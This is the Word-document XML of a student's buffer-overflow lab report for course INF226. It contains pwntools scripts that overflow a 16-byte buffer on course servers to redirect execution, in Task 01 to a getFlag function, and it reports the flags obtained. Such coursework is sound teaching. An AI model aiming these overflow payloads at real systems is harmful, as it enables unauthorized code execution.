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B99E" w14:textId="77777777" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="009E29FB" w:rsidP="009E29FB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Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FD9439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You should be able to explain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2C46E4" w14:textId="77777777" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="009E29FB" w:rsidP="009E29FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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 xml:space="preserve">how </w:t>
      </w:r>
      <w:r w:rsidRPr="009E29FB">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:u w:val="single"/>
          <w:lang w:val="nb-NO"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>buffer overflow attacks</w:t>
      </w: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 xml:space="preserve"> work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A88028" w14:textId="77777777" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="009E29FB" w:rsidP="009E29FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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how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the computer knows which code to run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B494483" w14:textId="77777777" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="009E29FB" w:rsidP="009E29FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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 xml:space="preserve">how </w:t>
      </w:r>
      <w:r w:rsidRPr="009E29FB">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:u w:val="single"/>
          <w:lang w:val="nb-NO"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>function calls</w:t>
      </w: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 xml:space="preserve"> work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D64874" w14:textId="77777777" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="009E29FB" w:rsidP="009E29FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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how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code and data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 for a program is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represented on disk and in memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA67583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6BF70797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And be able to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEB265C" w14:textId="77777777" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="009E29FB" w:rsidP="009E29FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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identify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data on a stack frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2B9707" w14:textId="77777777" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="009E29FB" w:rsidP="009E29FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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find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memory addresses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 of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code/data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 (</w:t>
      </w:r>
      <w:r w:rsidRPr="009E29FB">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>symbols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>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094DA7E9" w14:textId="77777777" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="009E29FB" w:rsidP="009E29FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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use </w:t>
      </w:r>
      <w:r w:rsidRPr="009E29FB">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="lightGray"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>pwntools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 to connect and communicate with a program, locally or on a network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032F4A40" w14:textId="77777777" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="009E29FB" w:rsidP="009E29FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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have a rough idea on how to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mitigate/prevent buffer overflow attacks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484019FE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5E320D93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For each exercise, include</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413FAB40" w14:textId="77777777" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="009E29FB" w:rsidP="009E29FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Short description of vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429990D7" w14:textId="77777777" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="009E29FB" w:rsidP="009E29FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Source code showing how to exploit the vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185652BD" w14:textId="77777777" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="009E29FB" w:rsidP="009E29FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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e.g. Python script showing exploit through </w:t>
      </w:r>
      <w:r w:rsidRPr="009E29FB">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="lightGray"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>pwntools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B0CCD7" w14:textId="77777777" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="009E29FB" w:rsidP="009E29FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Description of how the exploit works/what it does</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AF2614" w14:textId="77777777" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="009E29FB" w:rsidP="009E29FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Can be in the form of comments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41549C2A" w14:textId="77777777" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="009E29FB" w:rsidP="009E29FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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The flag retrieve from the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F7DB5C" w14:textId="77777777" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="009E29FB" w:rsidP="009E29FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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It'll be a string on the form </w:t>
      </w:r>
      <w:r w:rsidRPr="009E29FB">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="lightGray"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>INF226{...}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70A74C09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5D1CD986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6D1C505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8801467" w14:textId="77777777" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="009E29FB" w:rsidP="009E29FB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Task 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549B871D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6D9B3940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#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F044A8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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A86DD56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from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E61345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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7E0E9D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io = remote('inf226.puffling.no', 7000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520380FD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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3988AD48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line = b'A' * 16 + b'\xee\xff\xc0\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6C6E89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io.sendline(line)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D958BC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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422DEB67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print(io.recvall())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ACB6B7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5AEA84B0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71F137AA" w14:textId="77777777" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="009E29FB" w:rsidP="009E29F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val="nb-NO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val="nb-NO"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF16BE5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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C502D6" w14:textId="67A211AB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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09A9DFC3" wp14:editId="132E05D2">
            <wp:extent cx="4107180" cy="1057275"/>
            <wp:effectExtent l="0" t="0" r="7620" b="9525"/>
            <wp:docPr id="196902667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26676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B2FE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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9E3DB9" w14:textId="6BA7EA56" w:rsidR="002F048F" w:rsidRPr="009E29FB" w:rsidRDefault="002F048F" w:rsidP="002F048F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A1624D">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>As the output shows, the flag for task 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00A1624D">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidRPr="002F048F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009E29FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:u w:val="single"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>INF226{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:u w:val="single"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>s33kret c0de</w:t>
      </w:r>
      <w:r w:rsidRPr="009E29FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:u w:val="single"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r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76D69A4A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1E9F3CF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73B0778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1E9A5412" w14:textId="77777777" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="009E29FB" w:rsidP="009E29FB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Task 01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21980956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60AAF711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#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D52450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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DEE270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from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508BC999" w14:textId="5439045C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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC1E334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io = remote('INF226.puffling.no', 7001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4DD75A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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274B670C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color w:val="385623" w:themeColor="accent6" w:themeShade="80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color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t># 00000000004011d6 &lt;getFlag&gt; from objdump -d ./01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BCF88D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line = b'A' * 16 + b'\xd6\x11\x40\x00\x00\x00\x00\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7697EDBF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io.sendline(line)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D889EE4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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4456E3" w14:textId="77777777" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="009E29FB" w:rsidP="009E29FB">
      <w:pPr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9E29FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>print(io.recvall())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C615F0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7445901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0417336A" w14:textId="6C0A7517" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="005B1519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BF4353">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>NTS: The ‘line’ variable does not have to be that specific address… idk why. Also works with others. Figure out why somehow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7B0FE4" w14:textId="77777777" w:rsidR="00BF4353" w:rsidRDefault="00BF4353" w:rsidP="009E29F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</w:p>
    <w:p w14:paraId="091C2EE5" w14:textId="1766C407" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="009E29FB" w:rsidP="009E29F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Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193FC250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E0E369A" w14:textId="4AE18C52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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54F9F7B5" wp14:editId="35D1C0E3">
            <wp:extent cx="5132070" cy="1009650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="946021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1900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8CFC" w14:textId="77777777" w:rsid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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386C50F1" w14:textId="5E4F2D33" w:rsidR="009E29FB" w:rsidRPr="009E29FB" w:rsidRDefault="00A1624D" w:rsidP="002F048F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A1624D">
        <w:rPr>
          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>As the output shows, the flag for task 01 is</w:t>
      </w:r>
      <w:r w:rsidR="002F048F" w:rsidRPr="002F048F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F048F" w:rsidRPr="009E29FB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:u w:val="single"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>INF226{d3 h0ly gra1l}</w:t>
      </w:r>
      <w:r w:rsidR="002F048F"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2E6A01C6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3D2C2B3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7842897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64160158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B3E7AAA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66F4A299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672E213A" w14:textId="1D375BE5" w:rsidR="00DF2F7B" w:rsidRPr="002F048F" w:rsidRDefault="009E29FB" w:rsidP="00A1624D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/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sectPr w:rsidR="00DF2F7B" w:rsidRPr="002F048F" w:rsidSect="008E7EA3">
      <w:headerReference w:type="default" r:id="rId12"/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0F67" w14:textId="77777777" w:rsidR="0026247D" w:rsidRDefault="0026247D" w:rsidP="0026247D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="49CDF350" w14:textId="77777777" w:rsidR="0026247D" w:rsidRDefault="0026247D" w:rsidP="0026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</w:rPr>
      <w:id w:val="409506442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BE485F" w14:textId="49200DB2" w:rsidR="00873E7C" w:rsidRPr="00A1624D" w:rsidRDefault="00873E7C">
            <w:pPr>
              <w:pStyle w:val="Footer"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A1624D">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">Page </w: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begin"/>
            </w:r>
            <w:r w:rsidRPr="00A1624D">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGE </w:instrTex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separate"/>
            </w:r>
            <w:r w:rsidRPr="00A1624D">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2</w: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end"/>
            </w:r>
            <w:r w:rsidRPr="00A1624D">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> of </w: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begin"/>
            </w:r>
            <w:r w:rsidRPr="00A1624D">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:instrText xml:space="preserve"> NUMPAGES  </w:instrTex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separate"/>
            </w:r>
            <w:r w:rsidRPr="00A1624D">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2</w: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7A96FB" w14:textId="77777777" w:rsidR="00A5220E" w:rsidRPr="00A1624D" w:rsidRDefault="00A5220E">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consola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7F70" w14:textId="77777777" w:rsidR="0026247D" w:rsidRDefault="0026247D" w:rsidP="0026247D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="17D4175A" w14:textId="77777777" w:rsidR="0026247D" w:rsidRDefault="0026247D" w:rsidP="0026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7DA7" w14:textId="6BA32A05" w:rsidR="0026247D" w:rsidRPr="00A5220E" w:rsidRDefault="0026247D">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00A5220E">
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      </w:rPr>
      <w:t>INF226: Compulsory Assignment I</w:t>
    </w:r>
    <w:r w:rsidRPr="00A5220E">
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r w:rsidRPr="00A5220E">
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      </w:rPr>
      <w:tab/>
      <w:t>Frida Angen Hårstad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FF5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8438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65AF2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="90BC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A7FF4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D1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0887045">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="998310189">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="186177158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FB"/>
    <w:rsid w:val="0026247D"/>
    <w:rsid w:val="002F048F"/>
    <w:rsid w:val="003A4094"/>
    <w:rsid w:val="003C1512"/>
    <w:rsid w:val="00462CE5"/>
    <w:rsid w:val="005B1519"/>
    <w:rsid w:val="00873E7C"/>
    <w:rsid w:val="008E7EA3"/>
    <w:rsid w:val="009E29FB"/>
    <w:rsid w:val="009E43E2"/>
    <w:rsid w:val="00A1624D"/>
    <w:rsid w:val="00A5220E"/>
    <w:rsid w:val="00B2309A"/>
    <w:rsid w:val="00BF4353"/>
    <w:rsid w:val="00D040A4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29D4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FAF3D576-A46C-4D96-8A85-98EDECB7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8F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="009E2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2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F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29F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24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7D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002624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aa0b68-977f-4d68-9084-1e0376ff8a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D34C5F2D32C4AAAB044270ECA57DA" ma:contentTypeVersion="9" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="63e273ac3b51b78697e2c3ceb21950bb">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="96aa0b68-977f-4d68-9084-1e0376ff8ae9" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="1452b4192b6f4abe265f2bac6a64a404" ns3:_="">
    <xsd:import namespace="96aa0b68-977f-4d68-9084-1e0376ff8a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a0b68-977f-4d68-9084-1e0376ff8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4B8BEF-E3F8-4FF9-8A76-CDEC00BB12AB}">
  <ds:schemaRefs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96aa0b68-977f-4d68-9084-1e0376ff8ae9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CB023CB-C7AB-4C92-9D10-925565395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0A798-53B0-4DA2-8331-5495FD976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aa0b68-977f-4d68-9084-1e0376ff8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Angen Hårstad</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Frida Angen Hårstad</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-12T13:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-12T13:14:00Z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0x0101007BCD34C5F2D32C4AAAB044270ECA57DA</vt:lpwstr>
  </property>
</Properties>
</file>